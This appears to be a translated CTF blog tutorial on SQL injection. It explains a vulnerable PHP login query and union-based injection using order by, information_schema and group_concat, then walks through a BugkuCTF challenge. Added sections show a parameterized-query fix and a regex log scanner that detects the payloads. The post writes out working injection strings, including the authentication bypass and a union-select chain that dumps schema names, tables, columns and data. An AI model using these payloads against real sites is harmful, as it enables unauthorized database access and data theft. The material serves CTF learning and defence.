SQL injection-1

1. Why should we understand this knowledge

2. Principle

3. Own understanding and practice

4. CTF title case




A note before we start: the tone below may not be very friendly. If any wording is sensitive, leave a comment and I, the author, will change it.


Daily complaint: SQL gives me a headache, yet SQL injection is arguably the most important topic in Web security. Real-world SQL injection is quite rare nowadays, but that does not stop CTFs from setting these questions, and they are particularly painful. Every contest hands you a couple of SQL injection problems, especially the comprehensive ones: clearly a PHP code audit, then bypassing the filters found in the audit with a payload, all fine, and then after reading the code I find that it connects to a database. Good guy, SQL injection again. I admit SQL injection is genuinely hard for me; the online resources all look the same, and when I read a big name's SQL injection writeup I wonder whether we are looking at the same SQL injection. Having stared at enough payloads, I understand that SQL injection really comes down to accumulated experience and an understanding of SQL syntax.



Why should we understand this knowledge

SQL injection still ranks in the top ten vulnerability classes worldwide, so CTFs set SQL injection problems all the time. In my eyes SQL injection is not simple, and CTF SQL injection is even less so: it is mostly about bypassing filters and brute-forcing (fuzzing), and the basic CTF routine is to filter out every SQL injection statement you already know. Apart from giving me headaches, CTF SQL injection has one real purpose for a rookie like me: it forces you to understand the underlying principles instead of always relying on other people's payloads. That is how I understand CTF, so I will learn it now.

Principle

First, why does SQL injection exist? Not many people will show you the single line of PHP code behind it (why PHP? Don't ask; CTF is basically all PHP code):
$result=$link->query("select * from `user` where username='$user' and pwd='$pwd'");

Some beginners may not follow this, so here it is with the variables spelled out (你输入的用户名 is the username you typed, 你输入的密码 the password you typed):

$result=$link->query("select * from `user` where username='你输入的用户名' and pwd='你输入的密码'");

If you still don't see it, I'll keep writing. Take a look: is there anything wrong with this line of code? No problem, apparently. So today the old man will give you a test. Payload: the username you enter = admin%23(') or 1=1#(//)
Don't panic at this answer. Let's analyse first why there is a %23, a 1=1 and a #. No doubt the good brothers who read my blog have seen other bloggers' SQL injection posts, but did they say why? Don't ask why, the answer is just copied.
1. %23, because PHP may URL-decode the username you enter: urldecode(%23) = '
2. 1=1: everyone who has learnt a programming language understands that 1=1 evaluates to true
3. #: in various languages # is simply the comment character, Python for example; fine, I know that one
4. //: do I need to say it? A comment symbol
5. Why don't I write out the URL encoding? Don't ask me why, I forgot, and I'm too lazy to check. Write the payload into the statement:

$result=$link->query("select * from `user` where username='admin' or 1=1#' and pwd='$pwd'");

Just looking at this is not very interesting, so let me show you the real thing. Without further ado, real men never look back; look at the result:
[screenshot: query result]
Simply put, the grey part of the code is commented out. A few more words about comments: MySQL has three comment syntaxes:
1. # ...
2. -- ... (caution: there must be a space after the --)
3. /* ... */
Please stay calm while reading the results; let me lay them out. The most important part here is ' or 1=1: the quote simply closes the preceding string, and then, real guys, anyone who knows a programming language understands that false or true is true.
Some big bloggers use ' and 1=1 instead. I don't fully understand that, but the principle is the same: in short, make the condition true however you like.
You must be wondering why so many big names use ' and 1=1 or ' and 1=2. First, understand what the result of the code above is after the SQL statement executes:
1. true
2. look in the PHP code for single quotes: if there are some, you just close them by hand and the page is mostly fine, but without you adding a ' the SQL statement is malformed, so it reports an error
3. false
In fact, many pages query the database with an id compiled into the query, the common id=? thing. For example, id=1' and 1=1 is true in SQL syntax, so the page renders normally; conversely it is an error, and an error makes you very happy: an error indicates that your input reaches the SQL statement and is executed. Simply put, as long as you close the preceding quote, feel free to write other SQL statements afterwards. As long as you understand SQL statements deeply, you won't need me.
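The same mechanism, as an added example that is not part of the original post: a Python/SQLite stand-in for the PHP line above, with the spliced query beside a parameterized one. The `user` table, its two rows and the payload are constructed here. Note that %27 URL-decodes to ' and %23 to #; the demo sends the payload URL-encoded and uses the `-- ` comment form, which both MySQL and SQLite accept, where the post uses MySQL's #.

```python
import sqlite3
from urllib.parse import unquote

# Added demonstration, not code from the original post. SQLite stands in for MySQL;
# the `user` table and its two rows are constructed sample data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `user` (id INTEGER PRIMARY KEY, username TEXT, pwd TEXT)")
    conn.executemany(
        "INSERT INTO `user` (username, pwd) VALUES (?, ?)",
        [("admin", "correct-horse"), ("alice", "s3cret")],
    )
    conn.commit()
    return conn


def decode_param(raw):
    """What PHP does to a URL-encoded form value before it reaches the query."""
    return unquote(raw)


def build_query(user, pwd):
    """The string the PHP line on the page builds: input is spliced straight into SQL."""
    return f"select * from `user` where username='{user}' and pwd='{pwd}'"


def vulnerable_login(conn, user, pwd):
    """Runs the spliced query. Whatever SQL the user typed is parsed as SQL."""
    return conn.execute(build_query(user, pwd)).fetchall()


def safe_login(conn, user, pwd):
    """Same query with bound parameters: the driver sends the values separately,
    so a quote or comment character in the input is just data, never syntax."""
    sql = "select * from `user` where username=? and pwd=?"
    return conn.execute(sql, (user, pwd)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The page's payload, URL-encoded as a form would send it, with the `-- ` comment
    # form that both MySQL and SQLite accept in place of MySQL-only `#`.
    payload = decode_param("admin%27%20or%201%3D1%20--%20")
    print(build_query(payload, "x"))
    print("vulnerable:", vulnerable_login(conn, payload, "x"))  # every row
    print("safe:      ", safe_login(conn, payload, "x"))        # nothing
```

The spliced query returns every row because ' or 1=1 rewrites the WHERE clause and the comment discards the password check; the parameterized query returns nothing because the driver passes the whole string as a value, which is the fix for the PHP line on the page.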
Let me first say that SQL injection methods are divided into these types:
1. Boolean injection
2. Union (joint) injection
3. Multi-statement (stacked) injection
4. Error injection
5. Delayed (time-based) injection
6. Inline injection
Today we will talk about the simplest one, union injection.
Before the real MySQL statements arrive (the prerequisites above must be understood first), I must give you a few treasures.
1. order by (group by)
This is the sorting clause in MySQL. How can order by <number> tell how many columns a table has? Not many people explain it, so straight to the pictures.
[screenshot] First, the user table in my database has only three columns.
[screenshot] I don't need to say much once you see this: the order of id has changed, meaning it sorted, by column 3; look at the third column, l -> w -> z. Understand that order by <number> sorts by the column at that position; if the number exceeds the number of columns in the table, it cannot sort and errors out.
2. information_schema. Not much to say, the picture is enough, right? [screenshot]
3. This is the database I build most often. As long as you create a database, it already has information_schema. Simply put, it is the built-in metadata database. But why information_schema rather than the mysql, performance_schema or sys system tables? Here it comes, the official wording: information_schema holds information about all databases on the MySQL server, such as database names, database tables, and the data types and access privileges of table columns. In simpler terms, exactly which databases exist on this MySQL server, which tables are in each database, what the field types of each table are, what permissions each database requires for access, and so on, are all stored in information_schema.
The structure of information_schema is actually like a PHP dictionary, so the old man must show you the keys and values of this dictionary:
1. SCHEMATA [screenshot]
2. TABLES [screenshot]
3. COLUMNS [screenshot]
4. group_concat: after reading the value of each key above, anyone will feel dizzy, so we use group_concat to filter, for example to pull out schema_name from SCHEMATA, which lists the databases. [screenshot] You can see this function automatically puts the data in one row. That is why the big guys use it: otherwise the site only prints the first row of data.
5. union select. Surely this confuses many people. Don't worry, the author was just as clueless, until, until, until I tried it myself and understood what it is. [screenshot] Seeing this I instantly understood: it is like the command line. union executes and prints both queries, like & on the command line. After testing I also understood why the big brothers want to find out how many columns the table has. [screenshot]
So these really, really matter; doing it yourself, you gain a lot. This is what I know about union injection; there will be supplements later. I still suggest you try it yourself, it helps a lot.
Simple CTF union injection is not difficult. The common routine is to filter select and union, but I still got a good method from some big names.
Three-step method:
1. Find the injection point
2. Fuzz out unfiltered characters
3. Construct the payload / write a script
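From the defender's side, the probes listed in this section (order by N, and 1=2 ... union select, information_schema, a quote followed by a comment) are what a web-log review looks for. The scanner below is an added example, not from the original post; the access-log lines and the rule names are constructed for it.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the original post. The log lines below are constructed:
# one ordinary request, two carrying the probes discussed above (URL-encoded, as a
# browser or tool would send them), and one harmless search that merely contains
# the word "union".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2020:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Apr/2020:10:00:02 +0000] "GET /item.php?id=1%27%20order%20by%205%20%23 HTTP/1.1" 500 120
10.0.0.7 - - [01/Apr/2020:10:00:03 +0000] "GET /item.php?id=1%27%20and%201%3D2%20union%20select%201%2Cgroup_concat%28schema_name%29%2C3%2C4%20from%20information_schema.schemata%20%23 HTTP/1.1" 200 640
10.0.0.9 - - [01/Apr/2020:10:00:04 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 300
"""

# Each rule is applied to the URL-decoded query string, case-insensitively.
RULES = [
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    # a quote followed later by one of MySQL's three comment openers: #, "-- ", /*
    ("quote_then_comment", re.compile(r"'[^']*?(#|--(\s|$)|/\*)")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def query_string(line):
    """Pull the request target out of a combined-log line and decode its query part."""
    m = REQUEST_RE.search(line)
    if not m:
        return ""
    target = m.group(1)
    if "?" not in target:
        return ""
    return unquote_plus(target.split("?", 1)[1])


def scan_line(line):
    """Return the names of every rule the decoded query string of this line trips."""
    qs = query_string(line)
    return [name for name, rx in RULES if rx.search(qs)]


def scan_log(text):
    """(client ip, decoded query, matched rules) for every line that trips a rule."""
    findings = []
    for line in text.splitlines():
        hits = scan_line(line)
        if hits:
            findings.append((line.split()[0], query_string(line), hits))
    return findings


if __name__ == "__main__":
    for ip, qs, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}: {hits}\n    {qs}")
```

Decoding before matching matters: the probes arrive as %27, %23 and %20, and the raw line contains none of the keywords. The union rule requires a following select, which is why the union+station search is not flagged. Signature matching of this kind is a triage aid for log review, noisy and incomplete; the fix for the bug itself is the parameterized query, not the filter.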

CTF title case

Writeup of the BugkuCTF web question

[screenshot]
Three-step test without a comment character:
1. ' to determine whether the parameter is an integer or a string, and, if not an integer, whether the quote is closed afterwards
2. ' and 1=1
3. ' and 1=2
After trying the three steps above, add a comment character and run the three steps again; this time the third step echoes back. The usual blind routine follows:
input 1' order by 4 # and the page is normal;
input 1' order by 5 # and the page errors [screenshot];
so the table has four columns.
Input

 1' union select 1,group_concat(schema_name),3,4 from information_schema.schemata #

Insert picture description here
I found this situation a bit interesting: testing on a local database shows that the preceding SQL condition is true and prints one row. Make the first part false:

 1'  and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata #

[screenshot]
Input

 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='skctf_flag' #

Get the table name fl4g

 1' and 1=2 union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#

Get the column name skctf_flag

 1' and 1=2 union select skctf_flag,2,3,4 from fl4g#

After getting the flag, I feel this question is really quite cumbersome, so you can also check this big guy's writeup of the BugkuCTF web question.

Origin blog.csdn.net/a1309525802/article/details/105359223